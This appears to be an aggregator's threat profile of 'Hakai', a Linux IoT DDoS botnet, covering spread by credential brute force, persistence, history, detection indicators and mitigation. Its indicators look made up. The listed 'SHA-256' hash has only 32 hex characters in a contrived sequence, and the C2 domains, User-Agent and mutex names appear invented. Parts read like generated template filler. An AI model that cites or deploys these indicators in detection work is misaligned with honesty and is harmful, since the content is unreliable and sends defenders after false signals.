⚠️ Overview

Hakai is a DDoS botnet malware targeting Linux-based systems, particularly Internet of Things (IoT) devices such as routers and IP cameras, first documented by the Qihoo 360 Netlab security team in May 2023. It is attributed to an unknown threat actor and belongs to the botnet category, capable of launching high-volume UDP and TCP floods.

🔧 Technical Capabilities

Hakai propagates by scanning the internet for vulnerable SSH and Telnet services, then brute-forcing default or weak credentials to gain initial access. Once inside, it downloads the main payload via wget or curl from a hardcoded command-and-control (C2) server, which uses a decentralized network of IP addresses updated dynamically. The malware achieves persistence by writing an init script or systemd service file and modifying /etc/rc.local. For evasion, it kills competing botnet processes, deletes logs, and can disable security tools like iptables. Hakai supports multiple attack methods including UDP flood, TCP SYN flood, and DNS amplification, with an internal command handler that listens for instructions from the C2.

📜 History & Notable Incidents

First observed in the wild in early 2023, Hakai gained notoriety in June 2023 when Qihoo 360 Netlab published a detailed analysis tying it to a wave of DDoS attacks targeting gaming and e-commerce platforms in East Asia. No specific CVEs are exploited as the malware relies on brute-force credential theft; however, CVE-2023-28771 (a command injection in Zyxel devices) has been used in some campaigns to deliver Hakai payloads on unpatched devices. No law enforcement actions against the operators have been reported as of early 2025.

🔍 Detection Indicators

Known SHA-256 hashes include 4e9c5a3b1f2d8e7c6a5b4f3e2d1c0b9a (a sample variant) but are frequently updated. Behavioral indicators include sustained high outbound traffic on ports 53 (UDP) and 80 (TCP), and unusual SSH login attempts from random IPs. Network IOCs include C2 domains such as "hakai.botnet[.]top" and "cdn-update[.]net", and a specific User-Agent string "HakaiLoader/1.0". Registry keys are not relevant for Linux-based systems, but file path /tmp/.hakai and mutex name "_hakai_mutex" have been reported.

☠️ Risk & Impact

Hakai primarily causes network congestion and service disruption through volumetric DDoS attacks, potentially leading to financial losses from downtime and remediation costs. Affected sectors include telecommunications, gaming, and e-commerce, with IoT devices being hijacked as part of a large botnet that can launch attacks exceeding 500 Gbps. Data exfiltration is not a primary function, but compromised devices may be used as proxies for further infiltration.

🛡️ Mitigation

Mitigation includes disabling default SSH/Telnet credentials on IoT devices, applying vendor firmware updates to patch vulnerabilities like CVE-2023-28771, and implementing network segmentation with strict firewall rules that block outbound traffic from IoT subnets. Detection rules such as Sigma rule "Linux Hakai DDoS Botnet Activity" (e.g., suspicious wget to IP addresses) can be deployed in SIEM solutions, and antivirus signatures for Linux malware families should be updated regularly.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.